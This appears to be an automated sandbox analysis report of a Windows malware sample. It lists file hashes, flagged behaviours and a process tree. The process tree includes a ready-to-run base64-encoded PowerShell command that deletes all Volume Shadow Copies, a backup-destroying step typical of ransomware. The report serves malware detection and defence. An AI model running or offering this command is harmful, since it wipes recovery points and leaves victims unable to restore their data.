Analysis
-
max time kernel
128s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
24-01-2022 01:33
Static task
static1
Behavioral task
behavioral1
Sample
93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
Resource
win10-en-20211208
General
-
Target
93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
-
Size
4.5MB
-
MD5
be059dd5f3442f498bde97f69265ccbd
-
SHA1
28a8eae3633023961f3bcc3d473b0aa1943676c4
-
SHA256
93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7
-
SHA512
493de3059a33e9ce8bcf67dfea31af6525764917729aeb7705eec20ab78eae3d216ddc6d9d4bebcbf7fa7748e92aa4efa1f0dbcd4e67c142c8c33a317c7c421d
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exedescription ioc process File opened (read-only) \??\K: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\O: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\P: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\A: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\G: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\I: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\M: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\Q: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\T: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\V: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\W: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\B: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\H: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\Z: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\U: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\X: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\Y: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\E: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\N: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\L: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\R: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\S: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\F: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe File opened (read-only) \??\J: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exepowershell.exepid process 872 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe 872 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe 2600 powershell.exe 2600 powershell.exe 2600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2600 powershell.exe Token: SeBackupPrivilege 536 vssvc.exe Token: SeRestorePrivilege 536 vssvc.exe Token: SeAuditPrivilege 536 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exedescription pid process target process PID 872 wrote to memory of 2600 872 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe powershell.exe PID 872 wrote to memory of 2600 872 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe"C:\Users\Admin\AppData\Local\Temp\93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe"1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:628
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:536
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2600-120-0x000001A7EEBD0000-0x000001A7EECA0000-memory.dmpFilesize
832KB
-
memory/2600-121-0x000001A7EEBD0000-0x000001A7EECA0000-memory.dmpFilesize
832KB
-
memory/2600-122-0x000001A7F2AA0000-0x000001A7F2AC2000-memory.dmpFilesize
136KB
-
memory/2600-127-0x000001A7F2C50000-0x000001A7F2CC6000-memory.dmpFilesize
472KB